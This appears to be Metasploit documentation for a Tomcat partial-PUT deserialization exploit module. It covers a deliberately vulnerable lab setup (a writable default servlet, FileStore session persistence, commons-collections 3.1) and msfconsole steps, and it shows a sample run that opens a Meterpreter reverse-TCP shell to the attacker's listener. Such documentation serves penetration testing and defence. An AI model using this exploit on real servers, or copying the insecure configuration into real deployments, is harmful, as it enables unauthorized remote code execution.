adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3fa7fe68a14578fcd5a3e86e8ac34f02ef4e63ae
metasploit-gs/documentation/modules/exploit/multi/http/tomcat_partial_put_deserialization.md
T
Jack Heysel 6816589378 Added FileDropper for cleanup
2025-04-02 13:37:39 -07:00

5.2 KiB
Raw Blame History

Vulnerable Application

This module exploits a Java deserialization vulnerability in Apache Tomcat's session restoration functionality that can be exploited with a partial PUT to place an attacker controlled deserialization payload in the work directory. For the exploit to succeed, writes must be enabled for the default servlet, and org.apache.catalina.session.PersistentManager must be configured to use org.apache.catalina.session.FileStore.

Setup

Download Ubuntu Server 24: wget https://mirror.0xem.ma/ubuntu-releases/24.04.2/ubuntu-24.04.2-live-server-amd64.iso

Install ubuntu on your preferred hypervisor, enable SSH during installation. Reboot once installation is complete and SSH into the target. Download Tomcat and Java:

wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.90/bin/apache-tomcat-9.0.90.zip
wget https://cdn.azul.com/zulu/bin/zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz

Extract the JDK Archive to the appropriate directory:

tar -xvzf zulu8.80.0.17-ca-jdk8.0.422-linux_x64.tar.gz
sudo mkdir -p /opt/java
sudo mv zulu8.80.0.17-ca-jdk8.0.422-linux_x64 /opt/java/zulu8

Install unzip and extract Tomcat:

sudo apt install unzip -y
sudo unzip apache-tomcat-9.0.90.zip -d /opt/

Set CATALINA_HOME and JAVA_HOME also update PATH by adding the following to ~/.bashrc:

export CATALINA_HOME=/opt/apache-tomcat-9.0.90
export JAVA_HOME=/opt/java/zulu8
export PATH=$JAVA_HOME/bin:$PATH

Apply changes:

source ~/.bashrc

Change Tomcat permissions:

sudo chown -R msfuser:msfuser /opt/apache-tomcat-9.0.90
sudo chmod -R +x /opt/apache-tomcat-9.0.90/bin

Edit conf/web.xml and update the default servlet with the following:

    <servlet>
        <servlet-name>default</servlet-name>
        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
        <init-param>
            <param-name>debug</param-name>
            <param-value>0</param-value>
        </init-param>
        <init-param>
            <param-name>listings</param-name>
            <param-value>false</param-value>
        </init-param>
        <init-param>
          <param-name>readonly</param-name>
          <param-value>false</param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>

Edit conf/content.xml and add the following inside the pre-existing <Context> tags:

    <Manager className="org.apache.catalina.session.PersistentManager">
      <Store className="org.apache.catalina.session.FileStore" />
    </Manager>

Create the following directory inside the tomcat root directory:

mkdir -p webapps/ROOT/WEB-INF/lib
cd ./webapps/ROOT/WEB-INF/lib

Download the following dependencies:

wget https://repo1.maven.org/maven2/commons-logging/commons-logging/1.2/commons-logging-1.2.jar
wget https://repo1.maven.org/maven2/commons-beanutils/commons-beanutils/1.9.4/commons-beanutils-1.9.4.jar
wget https://repo1.maven.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.jar

Start the vulnerable Tomcat instance:

cd /opt/apache-tomcat-9.0.90/bin
./startup.sh

Options

GADGET

The desired ysoserial gadget to use to obtain RCE.

Verification Steps

  1. Start msfconsole
  2. use multi/http/tomcat_partial_put_deserialization
  3. set RHOST <TARGET_IP_ADDRESS>
  4. set RPORT <TARGET_PORT>
  5. set GADGET <YSOSERIAL_GADGET>
  6. set LHOST eth0
  7. check
  8. exploit

Scenarios

Apache Tomcat 9.0.90, jdk8.0.422 running on Ubuntu Server 24. Target: Linux Command

msf6 > use multi/http/tomcat_partial_put_deserialization
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set rport 8080
rport => 8080
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set rhost 172.16.199.130
rhost => 172.16.199.130
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > set gadget CommonsCollections6
gadget => CommonsCollections6
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > check
[!] This exploit may require manual cleanup of '../webapps/ROOT/YLNKdGSIcB.session' on the target
[+] 172.16.199.130:8080 - The target is vulnerable.
msf6 exploit(multi/http/tomcat_partial_put_deserialization) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Utilizing CommonsCollections6 deserialization chain
[+] Uploaded ysoserial payload (imNsIsZCCC.session) via partial PUT
[*] Attempting to deserialize session file..
[+] 500 error response usually indicates success :)
[*] Sending stage (24772 bytes) to 172.16.199.130
[+] Deleted ../webapps/ROOT/pAdshcNMRO.session
[+] Deleted ../webapps/ROOT/imNsIsZCCC.session
[*] Meterpreter session 6 opened (172.16.199.1:4444 -> 172.16.199.130:44562) at 2025-04-02 13:34:50 -0700

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : msfserver
OS              : Linux 6.8.0-57-generic #59-Ubuntu SMP PREEMPT_DYNAMIC Sat Mar 15 17:40:59 UTC 2025
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter >
Reference in New Issue View Git Blame Copy Permalink